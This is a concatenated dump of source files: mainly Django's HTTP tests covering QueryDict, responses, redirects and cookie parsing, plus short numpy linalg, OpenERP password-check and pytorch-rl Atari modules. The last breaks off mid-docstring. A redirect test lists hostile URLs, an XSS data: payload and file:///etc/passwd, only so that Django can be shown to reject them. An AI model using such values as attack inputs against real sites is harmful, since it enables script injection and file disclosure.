HttpResponseRedirect, JsonResponse, QueryDict, SimpleCookie,
StreamingHttpResponse, parse_cookie,
)
from django.test import SimpleTestCase
from django.utils.functional import lazystr
class QueryDictTests(SimpleTestCase):
    """Tests for django.http.QueryDict (a multi-value dict, immutable by default)."""

    def test_create_with_no_args(self):
        self.assertEqual(QueryDict(), QueryDict(''))

    def test_missing_key(self):
        q = QueryDict()
        with self.assertRaises(KeyError):
            q.__getitem__('foo')

    def test_immutability(self):
        # Every mutating method must raise AttributeError on an immutable QueryDict.
        q = QueryDict()
        with self.assertRaises(AttributeError):
            q.__setitem__('something', 'bar')
        with self.assertRaises(AttributeError):
            q.setlist('foo', ['bar'])
        with self.assertRaises(AttributeError):
            q.appendlist('foo', ['bar'])
        with self.assertRaises(AttributeError):
            q.update({'foo': 'bar'})
        with self.assertRaises(AttributeError):
            q.pop('foo')
        with self.assertRaises(AttributeError):
            q.popitem()
        with self.assertRaises(AttributeError):
            q.clear()

    def test_immutable_get_with_default(self):
        q = QueryDict()
        self.assertEqual(q.get('foo', 'default'), 'default')

    def test_immutable_basic_operations(self):
        # Read-only operations work on an empty immutable QueryDict.
        q = QueryDict()
        self.assertEqual(q.getlist('foo'), [])
        self.assertNotIn('foo', q)
        self.assertEqual(list(q), [])
        self.assertEqual(list(q.items()), [])
        self.assertEqual(list(q.lists()), [])
        self.assertEqual(list(q.keys()), [])
        self.assertEqual(list(q.values()), [])
        self.assertEqual(len(q), 0)
        self.assertEqual(q.urlencode(), '')

    def test_single_key_value(self):
        """Test QueryDict with one key/value pair"""

        q = QueryDict('foo=bar')
        self.assertEqual(q['foo'], 'bar')
        with self.assertRaises(KeyError):
            q.__getitem__('bar')
        with self.assertRaises(AttributeError):
            q.__setitem__('something', 'bar')

        self.assertEqual(q.get('foo', 'default'), 'bar')
        self.assertEqual(q.get('bar', 'default'), 'default')
        self.assertEqual(q.getlist('foo'), ['bar'])
        self.assertEqual(q.getlist('bar'), [])

        with self.assertRaises(AttributeError):
            q.setlist('foo', ['bar'])
        with self.assertRaises(AttributeError):
            q.appendlist('foo', ['bar'])

        self.assertIn('foo', q)
        self.assertNotIn('bar', q)

        self.assertEqual(list(q), ['foo'])
        self.assertEqual(list(q.items()), [('foo', 'bar')])
        self.assertEqual(list(q.lists()), [('foo', ['bar'])])
        self.assertEqual(list(q.keys()), ['foo'])
        self.assertEqual(list(q.values()), ['bar'])
        self.assertEqual(len(q), 1)

        with self.assertRaises(AttributeError):
            q.update({'foo': 'bar'})
        with self.assertRaises(AttributeError):
            q.pop('foo')
        with self.assertRaises(AttributeError):
            q.popitem()
        with self.assertRaises(AttributeError):
            q.clear()
        with self.assertRaises(AttributeError):
            q.setdefault('foo', 'bar')

        self.assertEqual(q.urlencode(), 'foo=bar')

    def test_urlencode(self):
        # urlencode() percent-encodes by default; `safe` exempts characters.
        q = QueryDict(mutable=True)
        q['next'] = '/a&b/'
        self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
        self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
        q = QueryDict(mutable=True)
        q['next'] = '/t\xebst&key/'
        self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
        self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')

    def test_mutable_copy(self):
        """A copy of a QueryDict is mutable."""
        q = QueryDict().copy()
        with self.assertRaises(KeyError):
            q.__getitem__("foo")
        q['name'] = 'john'
        self.assertEqual(q['name'], 'john')

    def test_mutable_delete(self):
        q = QueryDict(mutable=True)
        q['name'] = 'john'
        del q['name']
        self.assertNotIn('name', q)

    def test_basic_mutable_operations(self):
        # Full read/write API on a mutable QueryDict, including multi-value
        # semantics: __getitem__ returns the LAST value of a list.
        q = QueryDict(mutable=True)
        q['name'] = 'john'
        self.assertEqual(q.get('foo', 'default'), 'default')
        self.assertEqual(q.get('name', 'default'), 'john')
        self.assertEqual(q.getlist('name'), ['john'])
        self.assertEqual(q.getlist('foo'), [])

        q.setlist('foo', ['bar', 'baz'])
        self.assertEqual(q.get('foo', 'default'), 'baz')
        self.assertEqual(q.getlist('foo'), ['bar', 'baz'])

        q.appendlist('foo', 'another')
        self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
        self.assertEqual(q['foo'], 'another')
        self.assertIn('foo', q)

        self.assertCountEqual(q, ['foo', 'name'])
        self.assertCountEqual(q.items(), [('foo', 'another'), ('name', 'john')])
        self.assertCountEqual(q.lists(), [('foo', ['bar', 'baz', 'another']), ('name', ['john'])])
        self.assertCountEqual(q.keys(), ['foo', 'name'])
        self.assertCountEqual(q.values(), ['another', 'john'])

        q.update({'foo': 'hello'})
        self.assertEqual(q['foo'], 'hello')
        self.assertEqual(q.get('foo', 'not available'), 'hello')
        self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another', 'hello'])
        self.assertEqual(q.pop('foo'), ['bar', 'baz', 'another', 'hello'])
        self.assertEqual(q.pop('foo', 'not there'), 'not there')
        self.assertEqual(q.get('foo', 'not there'), 'not there')
        self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
        self.assertEqual(q['foo'], 'bar')
        self.assertEqual(q.getlist('foo'), ['bar'])
        self.assertIn(q.urlencode(), ['foo=bar&name=john', 'name=john&foo=bar'])

        q.clear()
        self.assertEqual(len(q), 0)

    def test_multiple_keys(self):
        """Test QueryDict with two key/value pairs with same keys."""

        q = QueryDict('vote=yes&vote=no')

        self.assertEqual(q['vote'], 'no')
        with self.assertRaises(AttributeError):
            q.__setitem__('something', 'bar')

        self.assertEqual(q.get('vote', 'default'), 'no')
        self.assertEqual(q.get('foo', 'default'), 'default')
        self.assertEqual(q.getlist('vote'), ['yes', 'no'])
        self.assertEqual(q.getlist('foo'), [])

        with self.assertRaises(AttributeError):
            q.setlist('foo', ['bar', 'baz'])
        # NOTE(review): duplicated setlist check; the second was presumably
        # meant to exercise setlistdefault -- confirm against upstream.
        with self.assertRaises(AttributeError):
            q.setlist('foo', ['bar', 'baz'])
        with self.assertRaises(AttributeError):
            q.appendlist('foo', ['bar'])

        self.assertIn('vote', q)
        self.assertNotIn('foo', q)
        self.assertEqual(list(q), ['vote'])
        self.assertEqual(list(q.items()), [('vote', 'no')])
        self.assertEqual(list(q.lists()), [('vote', ['yes', 'no'])])
        self.assertEqual(list(q.keys()), ['vote'])
        self.assertEqual(list(q.values()), ['no'])
        self.assertEqual(len(q), 1)

        with self.assertRaises(AttributeError):
            q.update({'foo': 'bar'})
        with self.assertRaises(AttributeError):
            q.pop('foo')
        with self.assertRaises(AttributeError):
            q.popitem()
        with self.assertRaises(AttributeError):
            q.clear()
        with self.assertRaises(AttributeError):
            q.setdefault('foo', 'bar')
        with self.assertRaises(AttributeError):
            q.__delitem__('vote')

    def test_pickle(self):
        # QueryDicts must round-trip through pickle protocol 2.
        q = QueryDict()
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q, q1)
        q = QueryDict('a=b&c=d')
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q, q1)
        q = QueryDict('a=b&c=d&a=1')
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q, q1)

    def test_update_from_querydict(self):
        """Regression test for #8278: QueryDict.update(QueryDict)"""
        x = QueryDict("a=1&a=2", mutable=True)
        y = QueryDict("a=3&a=4")
        x.update(y)
        self.assertEqual(x.getlist('a'), ['1', '2', '3', '4'])

    def test_non_default_encoding(self):
        """#13572 - QueryDict with a non-default encoding"""
        q = QueryDict('cur=%A4', encoding='iso-8859-15')
        self.assertEqual(q.encoding, 'iso-8859-15')
        self.assertEqual(list(q.items()), [('cur', '€')])
        self.assertEqual(q.urlencode(), 'cur=%A4')
        # copy() and the copy module must preserve the encoding.
        q = q.copy()
        self.assertEqual(q.encoding, 'iso-8859-15')
        self.assertEqual(list(q.items()), [('cur', '€')])
        self.assertEqual(q.urlencode(), 'cur=%A4')
        self.assertEqual(copy.copy(q).encoding, 'iso-8859-15')
        self.assertEqual(copy.deepcopy(q).encoding, 'iso-8859-15')

    def test_querydict_fromkeys(self):
        self.assertEqual(QueryDict.fromkeys(['key1', 'key2', 'key3']), QueryDict('key1&key2&key3'))

    def test_fromkeys_with_nonempty_value(self):
        self.assertEqual(
            QueryDict.fromkeys(['key1', 'key2', 'key3'], value='val'),
            QueryDict('key1=val&key2=val&key3=val')
        )

    def test_fromkeys_is_immutable_by_default(self):
        # Match behavior of __init__() which is also immutable by default.
        q = QueryDict.fromkeys(['key1', 'key2', 'key3'])
        with self.assertRaisesMessage(AttributeError, 'This QueryDict instance is immutable'):
            q['key4'] = 'nope'

    def test_fromkeys_mutable_override(self):
        q = QueryDict.fromkeys(['key1', 'key2', 'key3'], mutable=True)
        q['key4'] = 'yep'
        self.assertEqual(q, QueryDict('key1&key2&key3&key4=yep'))

    def test_duplicates_in_fromkeys_iterable(self):
        self.assertEqual(QueryDict.fromkeys('xyzzy'), QueryDict('x&y&z&z&y'))

    def test_fromkeys_with_nondefault_encoding(self):
        key_utf16 = b'\xff\xfe\x8e\x02\xdd\x01\x9e\x02'
        value_utf16 = b'\xff\xfe\xdd\x01n\x00l\x00P\x02\x8c\x02'
        q = QueryDict.fromkeys([key_utf16], value=value_utf16, encoding='utf-16')
        expected = QueryDict('', mutable=True)
        expected['ʎǝʞ'] = 'ǝnlɐʌ'
        self.assertEqual(q, expected)

    def test_fromkeys_empty_iterable(self):
        self.assertEqual(QueryDict.fromkeys([]), QueryDict(''))

    def test_fromkeys_noniterable(self):
        with self.assertRaises(TypeError):
            QueryDict.fromkeys(0)
class HttpResponseTests(unittest.TestCase):
    """Tests for HttpResponse header handling, content coercion, and redirects."""

    def test_headers_type(self):
        r = HttpResponse()

        # ASCII strings or bytes values are converted to strings.
        r['key'] = 'test'
        self.assertEqual(r['key'], 'test')
        r['key'] = 'test'.encode('ascii')
        self.assertEqual(r['key'], 'test')
        self.assertIn(b'test', r.serialize_headers())

        # Non-ASCII values are serialized to Latin-1.
        r['key'] = 'café'
        self.assertIn('café'.encode('latin-1'), r.serialize_headers())

        # Other unicode values are MIME-encoded (there's no way to pass them as bytes).
        r['key'] = '†'
        self.assertEqual(r['key'], '=?utf-8?b?4oCg?=')
        self.assertIn(b'=?utf-8?b?4oCg?=', r.serialize_headers())

        # The response also converts string or bytes keys to strings, but requires
        # them to contain ASCII
        r = HttpResponse()
        del r['Content-Type']
        r['foo'] = 'bar'
        headers = list(r.items())
        self.assertEqual(len(headers), 1)
        self.assertEqual(headers[0], ('foo', 'bar'))

        r = HttpResponse()
        del r['Content-Type']
        r[b'foo'] = 'bar'
        headers = list(r.items())
        self.assertEqual(len(headers), 1)
        self.assertEqual(headers[0], ('foo', 'bar'))
        self.assertIsInstance(headers[0][0], str)

        # Non-ASCII header names are rejected.
        r = HttpResponse()
        with self.assertRaises(UnicodeError):
            r.__setitem__('føø', 'bar')
        with self.assertRaises(UnicodeError):
            r.__setitem__('føø'.encode(), 'bar')

    def test_long_line(self):
        # Bug #20889: long lines trigger newlines to be added to headers
        # (which is not allowed due to bug #10188)
        h = HttpResponse()
        f = 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz a\xcc\x88'.encode('latin-1')
        f = f.decode('utf-8')
        h['Content-Disposition'] = 'attachment; filename="%s"' % f
        # This one is triggering http://bugs.python.org/issue20747, that is Python
        # will itself insert a newline in the header
        h['Content-Disposition'] = 'attachment; filename="EdelRot_Blu\u0308te (3)-0.JPG"'

    def test_newlines_in_headers(self):
        # Bug #10188: Do not allow newlines in headers (CR or LF)
        r = HttpResponse()
        with self.assertRaises(BadHeaderError):
            r.__setitem__('test\rstr', 'test')
        with self.assertRaises(BadHeaderError):
            r.__setitem__('test\nstr', 'test')

    def test_dict_behavior(self):
        """
        Test for bug #14020: Make HttpResponse.get work like dict.get
        """
        r = HttpResponse()
        self.assertIsNone(r.get('test'))

    def test_non_string_content(self):
        # Bug 16494: HttpResponse should behave consistently with non-strings
        r = HttpResponse(12345)
        self.assertEqual(r.content, b'12345')

        # test content via property
        r = HttpResponse()
        r.content = 12345
        self.assertEqual(r.content, b'12345')

    def test_iter_content(self):
        # Iterable content is flattened and coerced to bytes.
        r = HttpResponse(['abc', 'def', 'ghi'])
        self.assertEqual(r.content, b'abcdefghi')

        # test iter content via property
        r = HttpResponse()
        r.content = ['idan', 'alex', 'jacob']
        self.assertEqual(r.content, b'idanalexjacob')

        r = HttpResponse()
        r.content = [1, 2, 3]
        self.assertEqual(r.content, b'123')

        # test odd inputs
        r = HttpResponse()
        r.content = ['1', '2', 3, '\u079e']
        # '\xde\x9e' == unichr(1950).encode()
        self.assertEqual(r.content, b'123\xde\x9e')

        # .content can safely be accessed multiple times.
        r = HttpResponse(iter(['hello', 'world']))
        self.assertEqual(r.content, r.content)
        self.assertEqual(r.content, b'helloworld')
        # __iter__ can safely be called multiple times (#20187).
        self.assertEqual(b''.join(r), b'helloworld')
        self.assertEqual(b''.join(r), b'helloworld')
        # Accessing .content still works.
        self.assertEqual(r.content, b'helloworld')

        # Accessing .content also works if the response was iterated first.
        r = HttpResponse(iter(['hello', 'world']))
        self.assertEqual(b''.join(r), b'helloworld')
        self.assertEqual(r.content, b'helloworld')

        # Additional content can be written to the response.
        r = HttpResponse(iter(['hello', 'world']))
        self.assertEqual(r.content, b'helloworld')
        r.write('!')
        self.assertEqual(r.content, b'helloworld!')

    def test_iterator_isnt_rewound(self):
        # Regression test for #13222
        r = HttpResponse('abc')
        i = iter(r)
        self.assertEqual(list(i), [b'abc'])
        self.assertEqual(list(i), [])

    def test_lazy_content(self):
        r = HttpResponse(lazystr('helloworld'))
        self.assertEqual(r.content, b'helloworld')

    def test_file_interface(self):
        # HttpResponse supports write()/tell(); tell() counts encoded bytes.
        r = HttpResponse()
        r.write(b"hello")
        self.assertEqual(r.tell(), 5)
        r.write("привет")
        self.assertEqual(r.tell(), 17)

        r = HttpResponse(['abc'])
        r.write('def')
        self.assertEqual(r.tell(), 6)
        self.assertEqual(r.content, b'abcdef')

        # with Content-Encoding header
        r = HttpResponse()
        r['Content-Encoding'] = 'winning'
        r.write(b'abc')
        r.write(b'def')
        self.assertEqual(r.content, b'abcdef')

    def test_stream_interface(self):
        r = HttpResponse('asdf')
        self.assertEqual(r.getvalue(), b'asdf')

        r = HttpResponse()
        self.assertIs(r.writable(), True)
        r.writelines(['foo\n', 'bar\n', 'baz\n'])
        self.assertEqual(r.content, b'foo\nbar\nbaz\n')

    def test_unsafe_redirect(self):
        # Redirects to non-HTTP(S) schemes must be rejected.
        bad_urls = [
            'data:text/html,<script>window.alert("xss")</script>',
            'mailto:test@example.com',
            'file:///etc/passwd',
        ]
        for url in bad_urls:
            with self.assertRaises(DisallowedRedirect):
                HttpResponseRedirect(url)
            with self.assertRaises(DisallowedRedirect):
                HttpResponsePermanentRedirect(url)
class HttpResponseSubclassesTests(SimpleTestCase):
    """Tests for the specialized HttpResponse subclasses (redirects, 304, 405)."""

    def test_redirect(self):
        response = HttpResponseRedirect('/redirected/')
        self.assertEqual(response.status_code, 302)
        # Standard HttpResponse init args can be used
        response = HttpResponseRedirect(
            '/redirected/',
            content='The resource has temporarily moved',
            content_type='text/html',
        )
        self.assertContains(response, 'The resource has temporarily moved', status_code=302)
        self.assertEqual(response.url, response['Location'])

    def test_redirect_lazy(self):
        """Make sure HttpResponseRedirect works with lazy strings."""
        r = HttpResponseRedirect(lazystr('/redirected/'))
        self.assertEqual(r.url, '/redirected/')

    def test_redirect_repr(self):
        response = HttpResponseRedirect('/redirected/')
        expected = '<HttpResponseRedirect status_code=302, "text/html; charset=utf-8", url="/redirected/">'
        self.assertEqual(repr(response), expected)

    def test_invalid_redirect_repr(self):
        """
        If HttpResponseRedirect raises DisallowedRedirect, its __repr__()
        should work (in the debug view, for example).
        """
        # __new__/__init__ split so repr() can be checked on the
        # partially-initialized instance after __init__ raises.
        response = HttpResponseRedirect.__new__(HttpResponseRedirect)
        with self.assertRaisesMessage(DisallowedRedirect, "Unsafe redirect to URL with protocol 'ssh'"):
            HttpResponseRedirect.__init__(response, 'ssh://foo')
        expected = '<HttpResponseRedirect status_code=302, "text/html; charset=utf-8", url="ssh://foo">'
        self.assertEqual(repr(response), expected)

    def test_not_modified(self):
        response = HttpResponseNotModified()
        self.assertEqual(response.status_code, 304)
        # 304 responses should not have content/content-type
        with self.assertRaises(AttributeError):
            response.content = "Hello dear"
        self.assertNotIn('content-type', response)

    def test_not_modified_repr(self):
        response = HttpResponseNotModified()
        self.assertEqual(repr(response), '<HttpResponseNotModified status_code=304>')

    def test_not_allowed(self):
        response = HttpResponseNotAllowed(['GET'])
        self.assertEqual(response.status_code, 405)
        # Standard HttpResponse init args can be used
        response = HttpResponseNotAllowed(['GET'], content='Only the GET method is allowed', content_type='text/html')
        self.assertContains(response, 'Only the GET method is allowed', status_code=405)

    def test_not_allowed_repr(self):
        response = HttpResponseNotAllowed(['GET', 'OPTIONS'], content_type='text/plain')
        expected = '<HttpResponseNotAllowed [GET, OPTIONS] status_code=405, "text/plain">'
        self.assertEqual(repr(response), expected)

    def test_not_allowed_repr_no_content_type(self):
        response = HttpResponseNotAllowed(('GET', 'POST'))
        del response['Content-Type']
        self.assertEqual(repr(response), '<HttpResponseNotAllowed [GET, POST] status_code=405>')
class JsonResponseTests(SimpleTestCase):
    """Serialization behaviour of JsonResponse."""

    def test_json_response_non_ascii(self):
        payload = {'key': 'łóżko'}
        response = JsonResponse(payload)
        self.assertEqual(json.loads(response.content.decode()), payload)

    def test_json_response_raises_type_error_with_default_setting(self):
        msg = (
            'In order to allow non-dict objects to be serialized set the '
            'safe parameter to False'
        )
        with self.assertRaisesMessage(TypeError, msg):
            JsonResponse([1, 2, 3])

    def test_json_response_text(self):
        response = JsonResponse('foobar', safe=False)
        self.assertEqual(json.loads(response.content.decode()), 'foobar')

    def test_json_response_list(self):
        response = JsonResponse(['foo', 'bar'], safe=False)
        self.assertEqual(json.loads(response.content.decode()), ['foo', 'bar'])

    def test_json_response_uuid(self):
        value = uuid.uuid4()
        response = JsonResponse(value, safe=False)
        # DjangoJSONEncoder serializes UUIDs as their string form.
        self.assertEqual(json.loads(response.content.decode()), str(value))

    def test_json_response_custom_encoder(self):
        class CustomDjangoJSONEncoder(DjangoJSONEncoder):
            def encode(self, o):
                return json.dumps({'foo': 'bar'})

        response = JsonResponse({}, encoder=CustomDjangoJSONEncoder)
        self.assertEqual(json.loads(response.content.decode()), {'foo': 'bar'})

    def test_json_response_passing_arguments_to_json_dumps(self):
        response = JsonResponse({'foo': 'bar'}, json_dumps_params={'indent': 2})
        self.assertEqual(response.content.decode(), '{\n  "foo": "bar"\n}')
class StreamingHttpResponseTests(SimpleTestCase):
    """Contract of StreamingHttpResponse.

    NOTE: statement order matters throughout this test -- iterating a
    response consumes its streaming content, so several assertions depend
    on the response not having been iterated yet.
    """

    def test_streaming_response(self):
        r = StreamingHttpResponse(iter(['hello', 'world']))

        # iterating over the response itself yields bytestring chunks.
        chunks = list(r)
        self.assertEqual(chunks, [b'hello', b'world'])
        for chunk in chunks:
            self.assertIsInstance(chunk, bytes)

        # and the response can only be iterated once.
        self.assertEqual(list(r), [])

        # even when a sequence that can be iterated many times, like a list,
        # is given as content.
        r = StreamingHttpResponse(['abc', 'def'])
        self.assertEqual(list(r), [b'abc', b'def'])
        self.assertEqual(list(r), [])

        # iterating over strings still yields bytestring chunks.
        r.streaming_content = iter(['hello', 'café'])
        chunks = list(r)
        # '\xc3\xa9' == unichr(233).encode()
        self.assertEqual(chunks, [b'hello', b'caf\xc3\xa9'])
        for chunk in chunks:
            self.assertIsInstance(chunk, bytes)

        # streaming responses don't have a `content` attribute.
        self.assertFalse(hasattr(r, 'content'))

        # and you can't accidentally assign to a `content` attribute.
        with self.assertRaises(AttributeError):
            r.content = 'xyz'

        # but they do have a `streaming_content` attribute.
        self.assertTrue(hasattr(r, 'streaming_content'))

        # that exists so we can check if a response is streaming, and wrap or
        # replace the content iterator.
        r.streaming_content = iter(['abc', 'def'])
        r.streaming_content = (chunk.upper() for chunk in r.streaming_content)
        self.assertEqual(list(r), [b'ABC', b'DEF'])

        # coercing a streaming response to bytes doesn't return a complete HTTP
        # message like a regular response does. it only gives us the headers.
        r = StreamingHttpResponse(iter(['hello', 'world']))
        self.assertEqual(bytes(r), b'Content-Type: text/html; charset=utf-8')

        # and this won't consume its content.
        self.assertEqual(list(r), [b'hello', b'world'])

        # additional content cannot be written to the response.
        r = StreamingHttpResponse(iter(['hello', 'world']))
        with self.assertRaises(Exception):
            r.write('!')

        # and we can't tell the current position.
        with self.assertRaises(Exception):
            r.tell()

        # getvalue() drains the whole stream into a single bytestring.
        r = StreamingHttpResponse(iter(['hello', 'world']))
        self.assertEqual(r.getvalue(), b'helloworld')
class FileCloseTests(SimpleTestCase):
    """File objects handed to responses as content must end up closed."""

    def setUp(self):
        # Disable the request_finished signal during this test
        # to avoid interfering with the database connection.
        request_finished.disconnect(close_old_connections)

    def tearDown(self):
        # Restore the handler disconnected in setUp().
        request_finished.connect(close_old_connections)

    def test_response(self):
        filename = os.path.join(os.path.dirname(__file__), 'abc.txt')

        # HttpResponse consumes file content eagerly, so the file is
        # already closed right after construction (before r.close()).
        file1 = open(filename)
        r = HttpResponse(file1)
        self.assertTrue(file1.closed)
        r.close()

        # when multiple file are assigned as content, make sure they are all
        # closed with the response.
        file1 = open(filename)
        file2 = open(filename)
        r = HttpResponse(file1)
        r.content = file2
        self.assertTrue(file1.closed)
        self.assertTrue(file2.closed)

    def test_streaming_response(self):
        filename = os.path.join(os.path.dirname(__file__), 'abc.txt')

        # unlike HttpResponse, the streaming variant keeps the file open
        # until the response itself is closed.
        file1 = open(filename)
        r = StreamingHttpResponse(file1)
        self.assertFalse(file1.closed)
        r.close()
        self.assertTrue(file1.closed)

        # when multiple file are assigned as content, make sure they are all
        # closed with the response.
        file1 = open(filename)
        file2 = open(filename)
        r = StreamingHttpResponse(file1)
        r.streaming_content = file2
        self.assertFalse(file1.closed)
        self.assertFalse(file2.closed)
        r.close()
        self.assertTrue(file1.closed)
        self.assertTrue(file2.closed)
class CookieTests(unittest.TestCase):
    """SimpleCookie output/round-trips and Django's parse_cookie() quirks."""

    def test_encode(self):
        """Semicolons and commas are encoded."""
        c = SimpleCookie()
        c['test'] = "An,awkward;value"
        self.assertNotIn(";", c.output().rstrip(';'))  # IE compat
        self.assertNotIn(",", c.output().rstrip(';'))  # Safari compat

    def test_decode(self):
        """Semicolons and commas are decoded."""
        c = SimpleCookie()
        c['test'] = "An,awkward;value"
        c2 = SimpleCookie()
        # output() starts with "Set-Cookie: "; [12:] keeps just the cookie.
        c2.load(c.output()[12:])
        self.assertEqual(c['test'].value, c2['test'].value)
        c3 = parse_cookie(c.output()[12:])
        self.assertEqual(c['test'].value, c3['test'])

    def test_decode_2(self):
        # A non-ASCII byte value survives the output/load round trip.
        c = SimpleCookie()
        c['test'] = b"\xf0"
        c2 = SimpleCookie()
        c2.load(c.output()[12:])
        self.assertEqual(c['test'].value, c2['test'].value)
        c3 = parse_cookie(c.output()[12:])
        self.assertEqual(c['test'].value, c3['test'])

    def test_nonstandard_keys(self):
        """
        A single non-standard cookie name doesn't affect all cookies (#13007).
        """
        self.assertIn('good_cookie', parse_cookie('good_cookie=yes;bad:cookie=yes'))

    def test_repeated_nonstandard_keys(self):
        """
        A repeated non-standard name doesn't affect all cookies (#15852).
        """
        self.assertIn('good_cookie', parse_cookie('a:=b; a:=c; good_cookie=yes'))

    def test_python_cookies(self):
        """
        Test cases copied from Python's Lib/test/test_http_cookies.py
        """
        self.assertEqual(parse_cookie('chips=ahoy; vienna=finger'), {'chips': 'ahoy', 'vienna': 'finger'})
        # Here parse_cookie() differs from Python's cookie parsing in that it
        # treats all semicolons as delimiters, even within quotes.
        self.assertEqual(
            parse_cookie('keebler="E=mc2; L=\\"Loves\\"; fudge=\\012;"'),
            {'keebler': '"E=mc2', 'L': '\\"Loves\\"', 'fudge': '\\012', '': '"'}
        )
        # Illegal cookies that have an '=' char in an unquoted value.
        self.assertEqual(parse_cookie('keebler=E=mc2'), {'keebler': 'E=mc2'})
        # Cookies with ':' character in their name.
        self.assertEqual(parse_cookie('key:term=value:term'), {'key:term': 'value:term'})
        # Cookies with '[' and ']'.
        self.assertEqual(parse_cookie('a=b; c=[; d=r; f=h'), {'a': 'b', 'c': '[', 'd': 'r', 'f': 'h'})

    def test_cookie_edgecases(self):
        # Cookies that RFC6265 allows.
        self.assertEqual(parse_cookie('a=b; Domain=example.com'), {'a': 'b', 'Domain': 'example.com'})
        # parse_cookie() has historically kept only the last cookie with the
        # same name.
        self.assertEqual(parse_cookie('a=b; h=i; a=c'), {'a': 'c', 'h': 'i'})

    def test_invalid_cookies(self):
        """
        Cookie strings that go against RFC6265 but browsers will send if set
        via document.cookie.
        """
        # Chunks without an equals sign appear as unnamed values per
        # https://bugzilla.mozilla.org/show_bug.cgi?id=169091
        self.assertIn('django_language', parse_cookie('abc=def; unnamed; django_language=en'))
        # Even a double quote may be an unnamed value.
        self.assertEqual(parse_cookie('a=b; "; c=d'), {'a': 'b', '': '"', 'c': 'd'})
        # Spaces in names and values, and an equals sign in values.
        self.assertEqual(parse_cookie('a b c=d e = f; gh=i'), {'a b c': 'd e = f', 'gh': 'i'})
        # More characters the spec forbids.
        self.assertEqual(parse_cookie('a b,c<>@:/[]?{}=d " =e,f g'), {'a b,c<>@:/[]?{}': 'd " =e,f g'})
        # Unicode characters. The spec only allows ASCII.
        self.assertEqual(parse_cookie('saint=André Bessette'), {'saint': 'André Bessette'})
        # Browsers don't send extra whitespace or semicolons in Cookie headers,
        # but parse_cookie() should parse whitespace the same way
        # document.cookie parses whitespace.
        self.assertEqual(parse_cookie(' = b ; ; = ; c = ; '), {'': 'b', 'c': ''})

    def test_httponly_after_load(self):
        # The httponly flag can still be set on a cookie parsed via load().
        c = SimpleCookie()
        c.load("name=val")
        c['name']['httponly'] = True
        self.assertTrue(c['name']['httponly'])

    def test_load_dict(self):
        c = SimpleCookie()
        c.load({'name': 'val'})
        self.assertEqual(c['name'].value, 'val')

    def test_pickle(self):
        rawdata = 'Customer="WILE_E_COYOTE"; Path=/acme; Version=1'
        expected_output = 'Set-Cookie: %s' % rawdata

        C = SimpleCookie()
        C.load(rawdata)
        self.assertEqual(C.output(), expected_output)

        # Cookies must survive pickling under every supported protocol.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            C1 = pickle.loads(pickle.dumps(C, protocol=proto))
            self.assertEqual(C1.output(), expected_output)
| bsd-3-clause |
victor-prado/broker-manager | environment/lib/python3.5/site-packages/numpy/linalg/__init__.py | 84 | 2343 | """
Core Linear Algebra Tools
=========================
=============== ==========================================================
Linear algebra basics
==========================================================================
norm Vector or matrix norm
inv Inverse of a square matrix
solve Solve a linear system of equations
det Determinant of a square matrix
slogdet Logarithm of the determinant of a square matrix
lstsq Solve linear least-squares problem
pinv Pseudo-inverse (Moore-Penrose) calculated using a singular
value decomposition
matrix_power Integer power of a square matrix
matrix_rank Calculate matrix rank using an SVD-based method
=============== ==========================================================
=============== ==========================================================
Eigenvalues and decompositions
==========================================================================
eig Eigenvalues and vectors of a square matrix
eigh Eigenvalues and eigenvectors of a Hermitian matrix
eigvals Eigenvalues of a square matrix
eigvalsh Eigenvalues of a Hermitian matrix
qr QR decomposition of a matrix
svd Singular value decomposition of a matrix
cholesky Cholesky decomposition of a matrix
=============== ==========================================================
=============== ==========================================================
Tensor operations
==========================================================================
tensorsolve Solve a linear tensor equation
tensorinv Calculate an inverse of a tensor
=============== ==========================================================
=============== ==========================================================
Exceptions
==========================================================================
LinAlgError Indicates a failed linear algebra operation
=============== ==========================================================
"""
from __future__ import division, absolute_import, print_function
# To get sub-modules
from .info import __doc__
from .linalg import *
from numpy.testing.nosetester import _numpy_tester
test = _numpy_tester().test
bench = _numpy_tester().bench
| mit |
smartforceplus/SmartForceplus | openerp/service/security.py | 211 | 1510 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
import openerp.exceptions
def login(db, login, password):
    """Delegate credential checking to the ``res.users`` model of *db*."""
    users_model = openerp.registry(db)['res.users']
    return users_model._login(db, login, password)
def check_super(passwd):
    """Validate the master (admin) password.

    Returns True on a match; raises AccessDenied otherwise.
    """
    if passwd != openerp.tools.config['admin_passwd']:
        raise openerp.exceptions.AccessDenied()
    return True
def check(db, uid, passwd):
    """Verify *passwd* for user *uid* through the ``res.users`` model."""
    users_model = openerp.registry(db)['res.users']
    return users_model.check(db, uid, passwd)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
lukashermann/pytorch-rl | core/envs/atari.py | 3 | 2986 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from copy import deepcopy
from gym.spaces.box import Box
import inspect
from utils.helpers import Experience # NOTE: here state0 is always "None"
from utils.helpers import preprocessAtari, rgb2gray, rgb2y, scale
from core.env import Env
class AtariEnv(Env):  # pixel-level inputs
    """Gym Atari environment wrapper producing pixel-level states.

